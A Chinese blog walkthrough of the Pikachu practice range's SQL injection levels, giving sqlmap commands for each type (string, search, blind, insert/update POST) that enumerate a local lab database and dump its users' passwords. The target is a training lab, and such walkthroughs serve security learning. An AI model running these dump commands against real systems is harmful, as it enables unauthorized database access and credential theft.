pikachu靶场SQL,sqlmap解法
GET型输入
字符型注入(此处细说):
随便输入点什么
URL
http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2
1.寻找注入点
sqlmap -u "URL"
sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2"
找到输入点为name处
2.寻找当前数据库
sqlmap -u"URL" --current-db
sqlmap -u"http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" --current-db
数据库为pikachu
3.寻找数据库为pikachu的所有表
sqlmap -u "URL" -D 数据库名 --tables
sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables
4.寻找表中的所有字段:
sqlmap -u "URL" -D 数据库名 -T 表名 --columns
sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns
5.寻找字段里面的值:
sqlmap -u "URL" -D 数据库名 -T 表名-C 字段1,字段2 --dump
sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password --dump
得到用户名密码
搜索型注入
URL:
http://192.168.56.1/pikachu2/vul/sqli/sqli_search.php?name=1&submit=1
命令:
sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_search.php?name=1&submit=1" -D pikachu -T users -C password --dump
xx型注入
URL:
http://192.168.56.1/pikachu2/vul/sqli/sqli_x.php?name=1&submit=1
命令:
sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_x.php?name=1&submit=1" -D pikachu -T users -C password --dump
盲注base on boolian
URL:
http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_b.php?name=222&submit=%E6%9F%A5%E8%AF%A2
命令:
sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_b.php?name=222&submit=1" -D pikachu -T users -C password --dump
盲注base on time
URL
http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_t.php?name=121&submit=1
sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_blind_t.php?name=121&submit=1" -D pikachu -T users -C password --dump
POST型注入
insert/update注入
insert注入
URL
http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_reg.php
在注册账号处抓包
使用sqlmap
sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_reg.php" --data="username=1111&password=1&sex=1&phonenum=1&email=1&add=1&submit=submit" -D pikachu -T users -C password --dump
sqlmap -u "URL" --data="表单名和表单值(bp上直接复制粘贴)" -D 数据库名 -T 表名 -C 字段名 --dump
全按y
这里按1
这里按1
得到密码:
update注入
先登入进去一个注册的账号,然后点击修改个人信息
URL
http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_edit.php
填写信息后用bp抓包,点击submit
输入命令:
sqlmap -u "http://192.168.56.1/pikachu2/vul/sqli/sqli_iu/sqli_edit.php" --data="sex=31231&phonenum=31231&add=3131&email=3131&submit=submit" -D pikachu -T users -C password --dump
sqlmap -u "URL" --data="sex=31231&phonenum=31231&add=3131&email=3131&submit=submit(把表单复制粘贴过来)" -D 数据库名-T 用户名 -C 字段1 --dump
这里一个一个试,1可以
有多个注射点,请选择一个注射点进行以下注射: [0]位置:POST,参数:sex,类型:单引号字符串(默认) [1]位置:POST,参数:phonenum,类型:单引号字符串 位置:POST,参数:add,类型:单引号字符串 [3]位置:POST,参数:email,类型:单引号字符串 [问]退出
得到密码
pikachu靶场SQL,sqlmap解法相关推荐
- Pikachu靶场-SQL注入-搜索型注入过关步骤
Pikachu靶场-SQL注入-搜索型注入过关步骤 首先要明白MySQL数据库模糊搜索的语句,like '常%'.like '%常'.like '%常%' 这个几个,这里就不详说这个语句了 判断注入点 ...
- Pikachu靶场—sql注入通关
Pikachu靶场-SQL注入篇 前言 一.数字型注入 二.字符型注入 三.搜索型注入 四.XX型注入 五.insert注入 六.delete注入 七.http header注入 八.盲注:基于布尔盲 ...
- Pikachu靶场-SQL Inject
Pikachu靶场-SQL Inject SQL Inject 漏洞原理概述 SQL Inject攻击流程 如何判断是否存在注入 如何判断注入点类型及常见注入类型 数字型 字符型 搜索型 XX型 SQ ...
- Pikachu靶场通关笔记--Sql Inject(SQL注入)
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞.一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原 ...
- pikachu靶场通关之sql注入系列
目录 一.前置知识 二.SQL注入 三. 注入的一般方法 1. 手动注入 (1)联合查询union注入: (2)基于报错信息注入: (3)盲注: 2. 使用sqlmap注入 (1) 前置知识 (2) ...
- Pikachu靶场练习
Pikachu靶场练习 自己学习用的,写不不好不准说我. 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶 ...
- pikachu靶场通关
pikachu靶场通关详解 一.靶场介绍 二.靶场配置 三.靶场实战 3.1 暴力破解漏洞 3.1.1暴力破解攻击&暴力破解漏洞概述 3.1.2暴力破解漏洞测试流程 3.1.3基于表单的暴力破 ...
- 攻防系列——pikachu靶场通关练习
目录 一.暴力破解 Burte Force(暴力破解)概述 (一)基于表单的暴力破解 (二)验证码绕过(on server) (三)验证码绕过(on client) (四)token 防爆破 二.Cr ...
- pikachu靶场通关技巧详解
目录 一.暴力破解 二.Cross-Site Scripting(XSS跨站脚本攻击) 三.CSRF(跨站请求伪造) 四.SQL-Inject 五.RCE 六.File Inclusion(文件包含漏 ...
最新文章
- 全息技术“量子飞跃”或彻底改变成像技术
- Aoite 系列(03) - 一起来 Redis 吧!
- 20155308 《信息安全系统设计基础》课程总结
- 1049. 数列的片段和
- 云炬创业政策学习笔记20210106
- Windows 11 任务管理器重磅升级!界面迎来全新设计,十年来首次大改!
- python函数对变量的作用_python函数对变量的作用及遵循的原则
- 西南科技大学城市学院计算机专科,西南科技大学城市学院官网
- windows平台下压缩tar.gz
- sql中带in条件的查询及提高效率
- 李开复:拥抱美丽的网络应用模式——云计算
- 电脑表格制作教程入门_微信销售小程序入门教程:制作+营销
- Hiho----无间道之并查集
- 21天学通Java学习笔记-Day03
- 开源FTP 服务器 FileZilla Server
- OLDX-FC开源飞控
- 一个div在另一个div里垂直居中显示
- 如何解决Worm.Win32.AutoRun.bqn(文件夹改exe病毒)
- Count(), Rank(),Percentile.inc() ,Quartile.inc()
- e4a 蓝牙温度app_单片机ESP8266无线传输DHT11温湿度(APP+E4A调试说明与程序设计)
热门文章
- 银行从业资格考试通过后如何申请证书
- 小波自适应阈值选取python_小波去噪阈值如何选取_小波阈值分析 - 全文
- 重装Win10系统之U盘启动盘的制作(详细教程)
- 虚幻四学习笔记(2)—— 学习途径
- linux强制网卡linkup,使用ip link set eth0 up 命令启用网卡后,网络不通的问题的解决...
- Comet OJ - 2019国庆欢乐赛 D1 入学考试 (简单版)
- 【数据结构】第十三站:排序(下)归并排序
- R语言逻辑回归logistic regression对付费用户进行预测
- Java-数据结构:树,这份资料可帮你解决95%的问题
- Octave是什么,以及Octave online的使用(相当于open source的matlab)